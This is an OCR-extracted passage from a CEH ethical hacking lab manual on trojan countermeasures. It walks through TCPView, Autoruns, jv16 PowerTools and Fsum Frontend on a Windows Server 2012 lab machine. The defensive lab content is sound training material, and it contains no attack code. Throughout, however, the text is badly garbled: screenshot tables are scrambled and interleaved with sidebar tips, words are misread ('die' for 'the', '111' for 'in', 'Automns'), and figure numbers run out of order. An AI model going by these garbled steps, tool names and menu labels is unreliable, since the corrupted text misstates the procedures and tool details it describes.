E svchost.exe 4272 TCP WIN-2N9STOSGL 49169 Wl
E svchost.exe 1808 TCP WIN-2N9ST0SGI.. 49187 Wl
1'‫ י‬svchost.exe 1552 UDP win-2n9stosgien bootps
E svchost.exe 1552 UDP win-2n9stosgien bootpc
1' ‫ י‬svchost.exe 9G0 UDP WIN-2N9ST0SGI... isakmp
E svchost.exe 1552 UDP win-2n9stosgien 2535
[□ svchost.exe 3092 UDP WIN-2N9STOSGL 3391
E svchost.exe 960 UDP WIN-2N9ST0SGL teredo
G3 If you are running E svchost.exe 960 UDP WIN-2N9ST0SGI... ipsec-msft
Autoruns without E svchostexe 1064 UDP WIN-2N9STOSGI.. llmnr *
administrative privileges on E svchost.exe 960 UDP win-2n9stosgien 53441 *
Windows Vista and attempt T7 System 4 TCP win-2n9stosgien netbios-ssn Wl
1 ‫ י‬System 4 TCP win-2n9stosgien microsoft-ds wir
to change die state of a
• 1 System 4 TCP win-2n9stosgien microsoft-ds wit
global entry, you'll be denied • ' System 4 TCP WIN-2N9STOSGI... http Wl
access 7‫ יי‬System 4 TCP WIN-2N9STOSGI... https Wl
T7 System 4 TCP WIN-2N9STOSGI... microsoft-ds Wl
• 1 System 4 TCP WIN-2N9STOSGI... 5985 Wl v
III n >
FIGURE 8.2: Tcpview Main window
5. Now it is analyzing die SMTP and odier ports.

TCPView - Sysinternals: www.sysinternals.com

‫ד‬
File Options Process View Help
y a
“rotocol Local Address Local Port Remote Address Remote Pott Stat
& Autoruns will display a CP WIN-2N9ST0SGL 3388 WIN-2N9ST0SGL 0 LIST
dialog with a button that CP WIN-2N9ST0SGL 5504 WIN-2N9ST0SGL 0 LIST
enables you to re-launch CP WIN-2N9ST0SGL 49153 WIN-2N9ST0SGL 0 LIST
Autoruns with CP WIN-2N9ST0SGL 49154 WIN-2N9ST0SGI.. 0 LIST
CP WIN-2N9ST0SGL 49159 WIN-2N9ST0SGI.. 0 LIST
administrative rights. You CP WIN-2N9ST0SGL 49161 WIN-2N9ST0SGI.. 0 LIST
can also use the -e CP WIN-2N9ST0SGL 49183 WIN-2N9ST0SGI.. 0 LIST
command-line option to CP WIN-2N9ST0SGL 49168 WIN-2N9ST0SGI.. 0 LIST
launch initially launch CP WIN-2N9ST0SGL 49169 WIN-2N9ST0SGI.. 0 LIST
Autoruns with CP WIN-2N9ST0SGL 49187 WIN-2N9ST0SGI.. 0 LIST
administrative rights DP win-2n9stosgien bootps x *
DP win-2n9stosgien bootpc * ‫יי‬
DP WIN-2N9ST0SGL isakmp ‫יי‬
DP win-2n9stosgien 2535 * ‫יי‬
DP WIN-2N9ST0SGL 3391 * ‫יי‬
DP WIN-2N9ST0SGL teredo ‫יי‬ ‫יי‬
DP WIN-2N9STOSGL ipsecmsft * ‫יי‬
DP WIN-2N9ST0SGL llmnr ‫יי‬ ‫יי‬
DP win-2n9stosgien 53441 ‫יי‬ ‫יי‬
CP win-2n9stosgien netbios-ssn WIN-2N9ST0SGL 0 LIST
CP win-2n9slosgien microsoft-ds win-egbhisgl 410 49158 EST,
CP wirv2n9$tosgien microsoft-ds windows8 49481 EST,
CP WIN-2N9ST0SGL http WIN-2N9ST0SGI.. 0 LIST
Cl There are several ways to CP WIN-2N9ST0SGL https WIN-2N9ST0SGI.. 0 LIST
get more information about CP WIN-2N9ST0SGL microsoft-ds WIN-2N9ST0SGI.. 0 LIST
. ‫ך‬
an autorun location or entry. < III
‫ח־‬
To view a location or entry
in Explorer or Regedit
chose Jump To in the Entry
menu or double-click on the FIGURE 8.3: Tcpview analyzing ports
entry or location's line in the
display You can also kill die process by double-clickuig diat respective process, and
dien clicking die End Process button.
Properties fo r dns.exe: 1572
| ‫ך־‬ Domain Name System (DNS) Server

Microsoft Corporation
Version: G.02.8400.0000
Path:
C:\Windows\System32\dns.exe
End Process
OK
FIGURE 8.4: Killing Processes

1m TASK 2 Go to Windows Server 2012 Virtual Machine.
Autoruns Double-click Autoruns.exe, which is located at D:\CEH-Tools\CEHv8

Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns.
It lists all processes. DLLs, and services.

O Autoruns [WIN-2N9STOSGIEN\Administrator] ‫ ־‬Sysinternals: www.sysinter.J ~

File Entry O ptions User Help
HijacksImage3 |ExecuteBoot3 |Codecs | ,‫־‬$► Applnit | ,‫־‬V KnownDLLs | A Wriogon

1ft Winsock Provtders ] & Print Monitors | t j j LSA Providers | £ ‫ ־‬Network Providers | 9 . Sidebar Gadgets
O Everything Logon < Explorer | & Internet Explorer | J Scheduled Tasks | Services | Drivers
Autorun Entry Description Publisher Image Path

■}jf HKLM\SOFTWARE\Microsoft\Window$ N T\CurrentVers10n\Winl0g0nl'AppS etup
O You can view Explorer's 0 g ] UsrLogon cmd c:\windows\system32\usrlo...
file properties dialog for an HKLM \S 0 FTWAR E\M croscrft\Wndows\CurrentVers10n\R un
0 [■13HotKeysCmds hkcmd Module Intel Corporation c: \windows\system32\hkc...
entry's image file by
0 £ 3 IgfxT ray igfxTray Module Intel Corporation c:\windows\system32\igfxtr...
choosing Properties in die
0 [■1‫־‬ Persistence persistence Module Intel Corporation c:\windows\system32\igfxp...
Entry menu. You can also $ H KLM\S 0 FTWAR E\W0w6432N ode\M icrosott\Wmdows\CurrentVersion\R un
have Autoruns automatically E Adobe ARM Adobe Reader and Acrobat. .. Adobe Systems Incorporated c:\program files (x86)Vcomm...
execute an Internet search in 0 [■1 Adobe Reader Adobe Acrobat SpeedLaun.. Adobe Systems Incorporated c:\program files (x86)\adob
your browser by selecting 0 EPS0N_UD_S.. EPSON USB Display V I 40 SEIKO EPSON CORPORA.. c:\program files (x86)\epso...
r‫־‬a r ‫\־‬ . . ■ ^ . T ■ ^ . . ™ .
Search Online in the Entry
menu.
Ready Windows Entries Hidden.
FIGURE 8.5: Automns Main Window
& Simply run Autoruns 1 °- following is the detailed list on die Logon tab.
and it shows you die
currendy configured auto- O Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinter...L
start applications in the I File Entry O ptions User Help
locations that most direcdy d is ) ^ 1 X ^
execute applications.
H Codecs | P Boot Execute | ^ Image Hjacks | [ j ) Applnit | KnownDLLs | ^ Winlogon
Perform a new scan that
fc* Winsock Providers Print Monitors LSA Providers £ Network Providers | Sidebar Gadgets
reflects changes to options
by refreshing die display !3 Everything | Logon ^ Explorer 4$ Internet Explorer '1 Scheduled Tasks | Services ^ Drivers

0 [ij] HotKeysCmds hkcmd Module Intel Corporation c:\windom\system32\hkc...
CQ Internet Explorer This 0 lafxTrav igfxT ray Module Intel Corporation c:\windows\system32\igfxtr
entry shows Browser Helper 0 lil Persistence persistence Module Intel Corporation c:\windows\system32\igfxp .
Objects (BHO's), Internet
Explorer toolbars and S E3 Adobe ARM Adobe Reader and Acrobat. . Adobe Systems Incorporated c:\program files (x86)\comm..
extensions 0 0 Adobe Reader... Adobe Acrobat SpeedLaun... Adobe Systems Incorporated c:\prog1am files (x86)\adob..
0 EPS0N_UD_S. EPSON USB Display V I.40 SEIKO EPSON CORPORA... c:\program files (x86)\epso.
0 9 googletalk Google Tak Google c:\program files (x86)Vgoogl.
0 fH SurvlavaUpdat JavalTM) Update Scheduler Sun Microsystems, Inc. c:\program files |x86)Vcomm
t S C:\ProgramDala\Microsoft\Windows\Start Menu\Progcams\Startup
Ready Windows Entries Hidden
FIGURE 8.9: Autonuis Logon list
11. The following are die Explorer list details.
C E H L ab M an u al P age 473 E th ica l H a c k in g an d C ounterm easures Copyiight © by EC-Council

All Rights Reserved. Reproduction is Stricdy Proliibited.
O Autoruns [WIN-2N9STOSGIEN\Administrator] ‫ ־‬Sysinternals: www.sysinter...L

| Codecs | 3 Boot Execute | 3 Image Hâcks | '■> Applnit | ' KnownDLLs ] A Wnbgon
& Services All Windows Winsock Providers | 1* Print Monitors | LSA Providers | Network Providers | Sidebar Gadgets
services configured to start Z? Everything | ^ Logon[ ,j Explorer £ Internet Explorer | J Scheduled Tasks | Services | Drivers
automatically when the Autorun Entry Desciiption Publisher Image Path

HKLM \S 0 FTWAR E\Classes\Protocois\F*er
system boots. 0 ^ te x t/x m l Microsoft Office XML MIME... Microsoft Corporation c:\pr0gramfiles\c0fnm0n fi..
•iff HKLM \S oftware\Classes\x\S heC xVContextM enuH andlers
0 ^ SnagltMainSh.. Snagit Shell Extension DLL TechSmith Corporation c:\program files (x86)\techs..
0 fo‫־‬ WinRAR WinRAR shel extension Alexander Roshal c:\programfiles\winrar\rare.
H KLM \S 0ftware\W0w6432N ode\Classes\x\S helE x\ContextM enuH andlers
0 SnagltMainSh . Snagit Shell Extension DLL TechSmith Corporation c:\program files (x86)\techs..
0 *V WinRAR32 WinRAR shel extension Alexander Roshal c:\programfiles\winrar\rare.
H KLM \S oftware\Classes\D irectory\S helE xSContextM enuH andlers
0 SnagltMainSh Snagit Shell Extension DLL TechSmith Corporation c:\program files (x8S)\techs.
FIGURE 8.10: Autonins Explorer list
12. The following are die Services list details.

O Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinter...L
*J & & B X *
H Codecs | ‫־־‬I Boot Execute ] 3 Image hijacks | [ j l Applnit | KnownDLLs | ^ Wintogon
fc?; Winsock Providers | & Print Monitors LSA Providers £ Network Providers 1 Sidebar Gadoets
(33 Drivers This displays all O Everything | ^ Logon | Explow T i Internet Explorer Scheduled Tasks | Services Drivers
kernel-mode drivers
registered on the system g HKLM\System\CurrentControlSet\Services
except those that are 0 [ 1 ‫ י‬AdobeFlashPta This service keeps you Ad... Adobe Systems Incorporated c: \windows\syswow64\ma
disabled 0 [■1 c2wts Service to convert claims b .. Microsoft Corporation c:\program filesNwindows id..
0 0 EMPJJDSA EPSON USB Display V I 40 SEIKO EPSON CORPORA.. c:\program files (x86)\epso...
0 F I M02illaMainten... The Mozia Maintenance S. . Mozila Foundation c:\program files (x86J\m02i ...
0 0ose Savesinstalationfilesused .. Microsoft Corporation c:\program files (x86)\comm
0 F I osoosvc Office Software Protection... Microsoft Corporation c:\program files\common fi
0 H WSusCertServer This service manages the c... Microsoft Corporation c:\program filesVupdate ser
FIGURE 8.11: Autoruns Services list
13. The following are die Drivers list details.
C E H L ab M a n u al P age 474 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council


3 Image Hâcks |ExecuteBoot! 3 |CodecsH [ ,‫־‬$ Applnit | ,‫־‬V KnownDLLs | A

ft Winsock Providers [ & Print Monroes | $ LSA Providers* | £‫ ־‬Network Providers | Sidebar Gadgets
O Everything | Logon | . < Explorer | ^ Internet Explorer | J Scheduled Tasks | Services Dnvers
£9 Scheduled Autorun Entry Description Publisher Image Path

HKLM\System\CurrentControlSet\Services
Tasks Task ^ 3ware | LSI 3ware SCSI Storpoct Driver}SI c: \windows\system32\drrve.
scheduler tasks S) adp94xx( Adaptec Windows SAS/SA... Adaptecjnc. c: \windows\system32\dr1ve.

adpahci ^ Adaptec Windows SATA St.. Adaptec, Inc. c: \ windows\system32\drive.
configured to start adpu320 Adaptec StorPort Ultra320... Adaptecjnc. c: \ window$\system32\dnve.
,‫־‬amdsata 4 AHD 1.2 Device Driver Advanced Micro Devices c: \ windows\system32\dnve.
at boot or logon amdsbs ^ AM D Technology AH Cl Co... AM D Technologies Inc. c: \ windows\system32\drive.
amdxata ^ Storage Filter Driver AdvancedMicroD evices c: \ window$\system32\drive.
Adaptec RAID Storpoct Driver PMC-Sierra, Inc. c: \ windowsSsystem32\drrve.
arcsas & Adaptec SAS RAID W S 0 3 ... PMC-SierraJnc. c: \window$\system32\drrve.
FIGURE 8.12: Autoruns Drivers list.
14. Tlie following is die KnownDLLs list 111 Antonins.

d j) & B X *
I?• Winsock Providers | ^ Print Monitors | ^ LSA Providers | f Network Providers | 9 • Sidebar Gadgets
‫כ‬
O Everythin
Ever/hing ^ Logon | Explorer ] & Internet Explorer ] J Scheduled Tasks 1 Services [ Drivers
Q Codecs Q Boot Execute | f"^ Image Hijacks | [ j | Applnit \ KnownDLLs j Winlogon

ijT HKLM \System\CurrentControlSet\Controf\S ession Manager\KnownDlls
0 13 _W0w64 File not found: C:\Wndows...
0 1‫ר‬ W ow64cpu File not found: C:\Wndows.
0 ■‫י‬ Wow64win File not found: C:\Wndows...
FIGURE 8.13: Autoruas Known DLL’s list.
15. Install and launch jv16 PowerTools 111 Windows Server 2012 (host
machine).
T A S K 4
16. jvl6 Power Tool is located at D:\CEH-Tools\CEHv8 Module 06 Trojans
and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012.
Jv16 Power Tool
17. To launch jv16 PowerTools, select die Start menu by hovering die mouse
cursor on die lower-left corner ot die desktop.
C E H L ab M a n u al P age 475 E tliical H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

‫י ״‬
Unilb
Rnta
€
(tarn
aP
PhutT..‫״‬
■3 Windows Server 2012

Wirdowt Server 2012 Rocate Cancxfatr Caucrnt.
fcvaluator copy. Eud *40.
.. . * J L J L . ‫ל‬ 1
FIGURE 7.1: Windows Server 2012 Start-Desktop
18. Click jv16 PowerTools 2012 111 Start menu apps.
Start A dm inistrator A
03 Winlogon
Notifications Shows DLLs
that register for Winlogon
notification of logon events
FIGURE 7.2: Windows Server 2012 Start Menu Apps
19. Click the Clean and fix my computer icon.
C] Winsock Providers
Shows registered Winsock
protocols, including
Winsock service providers.
Malware often installs itself
as a Winsock service
provider because there are
few tools diat can remove
them. Autoruns can uninstall
them, but cannot disable
them
C E H L ab M a n u al P age 476 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

P jvl 6 PowerTools 2012

1 E*e Language lo o k Help
O K r Trad LrnMDon n Effect - 60 days left Live Support: Handbook not

Onlne avadaWe
Home
Registry Tools
‫ו^ד‬ File Tools Fully remove

software and
Speed up my
computer
leftovers
System Tools
i
Privacy Tools
— Backups Control which

programs start
Immunize my
computer
Verify my downloads
are safe to a n
automabcaly
Acton Hstory
L
UJ Settings
Trial Reminder
■ 92<*>
Registry Health
9SV0
PC Health
jv l6 PowerTools (2.1.0.1173) runnng on Datacenter Edition (x64) with 7.9 GB o f RAM
[10:29:45 ‫ ־‬Tip]: Your system has now been analyzed. The health score of your computer ts 95 out o f 100 and the
health score o f yoir Wndows regstry 6 92 out o f 100. I f you scored under 100 you can improve! the ratings by
usrtg the Oean and Fa My Computer tool.
FIGURE 8.20: jvl6 Home page.
20. Tlie Clean and fix my computer dialog box appears. Click the Settings tab
and then click die Start button.
jv l 6 PowerTools 2012 [W8-x64] - Clean and fix my computer *
□ Settings Additional
#
Additional
Li 10
Search Ignore words
safety options words
S e ttin g s
Emphasize sa fe ty over both scan speed and the number o f found errors.
A
Emphasize the number o f found errors and speed over sa fe ty and accuracy.
Selected setting: Normal system scan policy: all W indows-related data is skipped for additional
safety. Only old temp files are listed.
Cancel
H

(3S LSA Providers Shows
registers Local Security
Authority (LSA)
authentication, notification
and security packages
FIGURE 8.21: jvl6 Clean and fix my computer dialogue.
21. It will analyze your system for tiles; this will take a few minutes.
1-1 jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer! ‫־‬ I‫ם‬P x
File Select Tools Help
[
‫יג‬ Analyzing your computer. This can
take a few mmutes. Please wait...
Abort
‫ ט‬Printer Monitor
Drivers Displays DLLs that
load into the print spooling
service. Malware has used
this support to autostart
itself
FIGURE 8.22: jvl6 Clean and fix my computer Analyzing.
22. Computer items will be listed after die complete analysis.

iv16 PowerTools 2012 rW8-x641 - Clean and fix mv comDuter! ‫־‬ !‫ ם‬r x
LJ You can save die results File Select Tools Help

of a scan with File->Save Item
and load a saved scan widi Severity
File->Load. These Description
commands work with native Tags
Autoruns file formats, but
Item / Seventy Descrpbon Tags
you can use File->Export to .....................
save a text-only version of !3 R e g istry E rrors 7
the scan results. You can
also automate the generation !‫ ־‬I ^ In v a lid file or d ire c to ry re fe re n c e 7
of native Autoruns export
files with command line I ] c ) R e g istry ju n k 266
options
‫ח‬ ♦J O b so le te so ftw a re e ntry 4
|~1 U se le ss e m pty k e y 146
‫ח‬ ♦J U se le ss file e xte n sio n 116
^ +J S ta rt m enu and d e s k to p items 23
Delete dose
I - II
Selected: 0, h igh lig h ted : 0, to ta l: 296
FIGURE 8.24: jvl6 Clean and fix my computer Items details.
23. Selected item details are as follows.
LJ Sidebar Displays
Windows sidebar gadgets

jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer

Item
Seventy
Description
Tags
Item / Seventy Descry to n Tags

A
13 R e g istry E rrors 7
13 ‫ח‬ In v a lid tile or d ire c to ry re fe re n c e 7
‫כ‬ HKCRUnstall :3 % FJe or directory X : =

1HKCRUnstal Fie or directory 'C:
^ HKLM\softw< 13% Fie or directory X :
_ ] H K L M \s o ttw ;^ B FJe or directory X :

□ HKLM\SOFT\/ 13% File or directory X :
□ HKLM\SOFT\l 13% Fie or directory X :
H Compare the current _ | HKLM\S0ttwi FJe or directory X :
Autoruns display with 13 R e g istry ju n k 266

□ V
previous results that you've
saved. Select File | Compare
and browse to die saved file.
Autoruns will display in Selected: 0, h ig h lig h te d : 0, to ta l: 296
green any new items, which

correspond to entries that FIGURE 8.23: jvl6 Clean and fix my compute! Items.
are not present in the saved
file. Note that it does not 24. The Registry junk section provides details for selected items.
show deleted items
1-‫ י‬jv16 PowerTools 2012 [W8‫־‬x64]~ Clean and fix my computer! ‫־־‬ ‫ם‬ *
[‫־־‬J If you are running Item

Autoruns without Severity
Description
administrative privileges on
Tags
Windows Vista and attempt
to change die state of a Item / Severity Description Tags
global entry, you'll be denied _] 3 R e g istry ju n k 266
access. Autoruns will display
a dialog with a button that 3 ‫ח‬ O b so le te s o ftw a re e ntry 4
enables you to re-launch □ HKCUVSoftw 30% Obsolete software e
Autoruns with □ HKCUôftw 30% Obsolete software {
administrative rights
□ HKUS\S-1-S- 30% Obsolete software ‫ז‬
□ HKUSV1-5- 30% Obsolete software e
□ (3 U se le ss e m pty ke y 146
□ HKCRVaaot | 10% Useless empty key

□ HKCRVaaot 20% Useless empty key
□ HKCRVacrot 20% Useless empty key
‫✓י‬
‫ח‬ MKCRV.aaot 20% Useless emotv kev
Selected: 0, h ig h lig h te d : 0, tota l: 296
FIGURE 8.25: jvl6 Clean and fix my computer Item registry junk.
25. Select all check boxes 111 die item list and click Delete. A dialog box appears.
Click Yes.
— L&S f c s l i l f i f l Page 479 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

Empty Locations selection All Rights Reserved. Reproduction is Stricdy Prohibited.
in die Options menu is
checked Autoruns doesn't
show locations with no
entries
jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer[

Item
Seventy
Description
Tags
Item Seventy Descnption Tags
0 J
jv16 PowerTools 2012
Y ou are a bo ut to delete a lo t o f erroneous registry data. Using th e Fix
O o p tio n is always th e better o p tio n . Are y o u sure y o u kn o w w h a t yo u are

d o in g and w a n t to proceed?
0 *I S la il m enu a n d d e s k to p item s 23/23
S e le c te d j2 9 ^ h ig h lig h te d ftto ta h 2 9 6
FIGURE 8.26: jvl6 Clean and fix my compute! Item check box.
26. Go to the Home tab, and click die Control which programs start
automatically icon.

UJ The Verify Signatures
option appears in the
Options menu on systems
that support image signing
verification and can result in
Autoruns querying
certificate revocation list
(CRL) web sites to FIGURE 8.28: jvl6 Control which program start automatically.
determine if image
signatures are valid 27. Check programs in Startup manager, and then you can select die
appropriate action.
jv16 PowerTools 2012 [W8-x64] - Startup Manager T Z S
Enabled Process running Yes ‫־‬
System entry No PID 4280

Program )usched.exe Threads 4
C! The Hide Microsoft C: program Files (x86)VCommon 1
Filename Base priority Normal
Entries selection omits Command Ine 'C:\program FJes (x86)\Common Memory usage 9.12 MB
images that have been Loaded from rt<EY_LOCAL,MACHINE \SOFTVV< Page file usage 2.23 MB
signed by Microsoft if Descrption JavaCTM) Update SchecUer File size 246.92 KB
Verify Signatures is Tags
selected and omits images Enabled / Program Descrption Tags
that have Microsoft in their
resource's company name |l 1 F o un d s o ftw a re 10 —
field if Verify Signatures is
I‫מ׳‬
S
■ Yes )usched.exe C:program Files
i
not selected
□ Yes googletalk.exe Google Talk C: program Files
□ Yes EMP_UO.exe EPSON USB Dispk C:\Program Files =
□ Yes Reader_sl.exe Adobe Acrobat S| C:\program Files

□ Yes AdobeARM.exe Adobe Reader ar1C: program Files
□ Yes 1gfxtray.exe igfxTray Module C:\Windowsteyst

□ Yes hkcmd.exe hkcmd Module C:\W indows^yst
□ Yes 1gfxpers.exe persistence Modi. C:\Windowsfeyst
FIGURE 8.29: jvl6 Startup Manager Dialogue.
28. Click die Registry Tools menu to view registry icons.
f!File Language Tools Help

I MACECRAFT Trial Urnta bon n Effect - 60 days left Live Support:

L
Handbook not
>SOFTWARE Online avaiaWe
B3 Use the Hide Microsoft
Entries or Hide Windows
Entries in the Options $
menu to help you identify
software that's been added Registry Tools m
Regstry
49
Registry
m
Registry Find Registry
to a system since installation. Manager F^der & Replace Cleaner
Autoruns prefixes the name
of an image's publisher with
"(Not verified)" if it cannot
verify a digital signature for
the file that's trusted by the
System Tools
j8>
Regetry Registry Registry
^ Privacy Tools Compactor Information Monitor
system
Backups
Acton Hstory
IU I Settings
100% Trial Reminder

Registry Health
You are using the free trial version o f jv l6 PowerTools. Pick here to buy the
real version'
FIGURE 8.30: jvl6 Registry tools.
29. Click File Tools to view hie icons.

EE1 The Hide Windows

Entries omits images signed
by Windows if Verify
Signatures is selected. If
Verify Signatures is not
selected, Hide Windows
Entries omits images that
have Microsoft in their
resource's company name
field and the image resides
beneath the %SystemRoot%
directory
FIGURE 8.31: jvl6 File tools.
30. Click System Tools ro view system icons.

jv16 PowerTools 2012 x
Fite Language Tools Help
I MACECRAFT Trial Untatoon In Effect - 60 days left Live Support:

L
Handbook not
' SO FTW ARE Online avaiaWe
Home
Qj
Registry Tools
U EH
Software Startup Start Menu Automation
Unnstaler Manager Tool Tool
!I m■! S ystem Tools
Service System
^ Privacy Tools Manager Optimizer
Backups
Action History
IQ I Settings
100% Trial Reminder

Registry Health
You are using the free trial version o f jv l6 PowerTools. Clio- to buy the
real version!
& Tools
demonstrated in
this lab are
available in
D:\CEH- FIGURE 8.32: jvl6 System tools.
Tools\CEHv8
Module 06 Trojans
§ a < & d 9 fl» ‫־‬Page 482 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council
31. Click Privacy tools to view privacy icon.

I E*e !,*"Quage 1001* Hdp
1MACECRAFT Trial Lfnitabon in Effect - 60 days left Live Support:

L
Handbook not
' S O FT W A R E Online avarfable
A Registry Tools
history Disk Wiper
Oeaner
1^ ‫ ך‬Fie Tools
B System Tools
Backups
Actjon Hstory
| L lj Settings
3 Trial Reminder
You are usng the free trial version of jv 16 PowerTools. C kk here to buy the
real version ‫י‬
FIGURE 8.33: jvl6 Privacy tools.
32. Click Backups in die menu to display die Backup Tool dialog box.
jv16 PowerTools 2012 T^TeT x T
£Q You can File Language loots Help
compare the MACECRAFT L

current Autoruns O SO FTW ARE
Trial Umitabon in Effect - 60 days left
jv16 PowerTools 2012 [W8‫־‬x64] ‫ ־‬Backup Tool I ~ I

Live Support: Handbook not
x 1
display with £He Select lo o k Help
previous results
that you've saved.
S elect Registry Fie Backups Othef
Backups Backups
File|Compare and
Descnptjon Type Size ID Created
browse to the
saved file. 0 13 File Backups
□ Clean and Data removed 34.6 KB 00062D 21.09.2012,

Autoruns will
display in green
any new items,
which correspond
to entries that are
not present in the
saved file. Note
that it does not Re Sejected^îighliqhted^ôtaM
show deleted
item s
■
FIGURE 8.34: jvl6 Backup took

33. Go to Windows Server 2012 Virtual Machine.

= TASK 5
34. Double-click FsumFrontEnd.exe, the executable tile located at D:\CEH-
FsumFrontEnd
Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder
Integrity Checker\Fsum Frontend.
35. The Fsum Frontend main window is shown 111 the following screenshot
Fsum Frontend v l .5.5.1 iz r^ * ‫׳‬
B - Q Fsum Frontend
Tools □ ₪
ESS
n M ethods (96)
B - Q Calculate hashe
‫ ח‬adlcrS Q adlcr15 Q adler32 ‫ח‬ ap hash C bdkr
5E= : : ‫ח‬ cfcsum_mp€c2 Q crc8 f ‫־‬l crc16 n crc16_ccitt H I crc16_ibm □ <rc16_125
Tod 2 3 - : ■ ■
Verify checksur 3&■■: □ crcl6_xr‫־>־‬dem □ crcl6_zmodem □ crcM □ crcJZ IZ crc32_br1p2 d crc32jamcrc
*G enerate chec i c1c32_mpcg2 1 i crc.54 O crc64_ecma ( j djb hash d dhoZ35 ( 7 e d o n k cy

Options 0 5 ! n dF32 (_) fletcher8 Q fletcherl 6 Q . fletcher32 CfnvO-22 L f n 1 / ‫י‬ ‫״‬0-64
‫•״״‬ About
Compare
Hath:
lS a .U a Encoding: Bate 16 (hexadecimal)
C ?L og
Web sits htipi.'/fsum fesourcefoi 2 ‫״‬,
& CEH-Tools are FIGURE 8.35: FsumFrontEnd main window.

also located 36. Select the type ot hash that you want; let’s say md5. Check die md5 check
mapped Network box.
Drive (Z:) of Virtual
Fsum Frontend v1.5.5.1
Machines _ Fsum Frontend
■j □ Tool*
. ______. . . %m. .........
I H-I‫ ־‬Calculatehaiht (_J haval224 (3) u haval224 (5) hava 1256(4) l_ h » v jl2 5 6 (5 )
u b*val224 (4) L h o v a l2 5 6 (3 )
&>*■ Q jihJK h □ m dl C l «nd4 (✓ m d * .| □ pananui
Tort □ /w ch
1 0 Verify checksur D pjw r32 n rip«m dl28 T 1 rlpem dlftO □ ripemd250 C ripemd320 C ‫ מ‬hash =
! G enera!• ch*ce 0 sdbm f l shaO D >h«1 □ »ha2 (224) C >ha2 (256) C 3h«2 (384)
; 8 8 O ptions 1 1 * 1 2 (5 1 2 ) n si:c64 f 1snc fru 2 128(41 T 1snefm 2 128 (81 r snefru2 256 W r snefru22S6f8> v
4 ‫י‬--‫ |־‬About
Mash:
F ie \m
^ Co ^ 0 a | UkQ Encoding: | Base 16 (hexadecimal) v □ hw ac
[<C
W eb titt http:.'/fsu r> » eto j‫«< ׳‬ror3 e n e ! I

FIGURE 8.36: FsumFrontEnd checking md5.
37. Select a tile by clicking die File browse bottom from die desktop. That is
Test.txt.
Fsum Frontcnd v1.5.5.1
Fsum Frortend
Q Tools □ M ethods ( 1 /9 6 )
L2 Calculate - 0 ‫ »ר‬11 ‫א‬
□ haval224 (J) □ hava!224 (4) □ h aval224 (S) C h a v a l2 5 6 (3 ) | hava!2S6 (4) Q ] hav3 2S0 (5)
j-c5 He
Q Have Autoruns : □ /hash □ jsh a sh □ m d? G m d4 B m d5 □ p M w r?
S 3 Verify chccksur ■•: □ p j"32 □ ripcmd128 G ripemdl&O E " 1ipemd256 E " ripcm d320 I is hash
automatically G eaerare check risdbm (~1 shaO Q shal □ sha2 (224) Q sha2 (256) □ sha2(3&4)
gH O ptions n « k a 2 CS12I (- I (17664 IH snefru2 128(4) I 1snefru2 128 (8) I snefru2 256 14) I snefru2 256 (1
execu te an J? | A bout :■
Internet search in Hash:
F ie |
your browser by =3 B , Encoding: |Base 16 [hexadecimal) v j O HMAC
selecting Search
Online in the Entry
menu
W log
W ebsite h ttp r.'/fium fesoircerorge-ne:
FIGURE 8.37: FsumFrontEnd file browse.
& Autoruns B--EZ Fsum Ficntcnd
displays the text a - S Tools

: b-Z H Calculate hashes
□ Methods :96(
‫ ח‬idler? H ladlerl6 □ adler32 n ap hash |‫ |־־‬bdlcr
"(Not verified)" ;-•G3 Fie
:- 2 3 T ec
D ( b u 1 r .m p c g 2 [H «c8 □ crc16 □ ac16_ccitt ‫ ח‬crc15_ibm □ ac15_x25
j Q V »rifychK h 1
next to the AJ Generate ch«<
company name of 0 © '• :1 ‫נ‬

Orgenirc ’ Nev» folder
an image that ■ Desktop
either d oes not J| Downleads

Computer
Recent places A- Folder
have a signature
Ito a rits Network
or has a signature 3 Documents SK System Folder
J 1 M udr
that is not signed Pictures
MotiIIj Firefox
Shortcut
by a certificate 3 Videos fe 1.06 KB
Google Chiomc
Shortcut
root authority on flP Computer
Local D«fc (C.)
<r 2.il KB
the list of root 1—a Lccel Disk D)

Test
Text Document
a Local Disk [&) 0 byte*
authorities trusted Filename: Test | a !I Files r . ‫־‬T
by the system 3
Website. http:Vfsumfc.50u ccfcrgc.‫* ׳‬ct
FIGURE 8.38: Fsum Front End file open.
38. Click Add Folder to select a folder to be added to die hash, for example,
D:\CEH-Tools

Fsum frontend v1.5.5.1 — I‫ם‬ x

B --IS Fsum Frontend
i) □ Tools | ‫ח‬ M ethods a / 95:
i 1- 1 ■I Calculate hasht
( J haval224 (J) [ J h«val224 (4) U h av a l2 2 4 (5 ) U haval258 (3) L havat25&(4) C h « v a l2 5 8 (5 )
‫־‬J “ ‫׳‬
!•••^Tort 3 H Q J‫ ז‬hJKh □ m dS L E ‫^ *ייי‬ L p a ru rra
K Verify checksur ‫ ח‬pj*32 n r i p « m d l2 8 M rlp e m d lftO P ripemd256 □ ripem d320 C ish a sh
j k Generate check ! □ »dbm □»haO □>hd1 □ »ha2 (224) C sh a 2 (2 S 6 ) ( I 384) 2««‫)נ‬
8 ij O ptions 1 ska2 (512) ‫ח‬ si:c€4 1 1 snc fru 2 123 (4) I snefw 2 128 (81 V snefru2 258 (41 T snef 1u 2 258 f8> v
About
Cow pare
Hash:
F ie l)ACEH-T0cls\CEHv3 M odule 06 Trojans a nd BackdoorsNFiles and Folder Integrity C h e d teiV sum frontend1.5‫ _ |־‬.
^ |_ 0 1 Encoding: |G ase 16 (hcxadcdmal) v| Qj HMAC
GflAutoiuns prefixes the File
name of an image's
publisher with "(Not
verified)" if it cannot verify a
digital signature for die file
that's trusted by the system
<
1t e L o JV =
W ebcit• http:7f1um fe to arc afo rg e .n et 1
FIGURE 8.39: FsumFrontEnd Add Folder.

Fsum Frontend v1.5.5.1
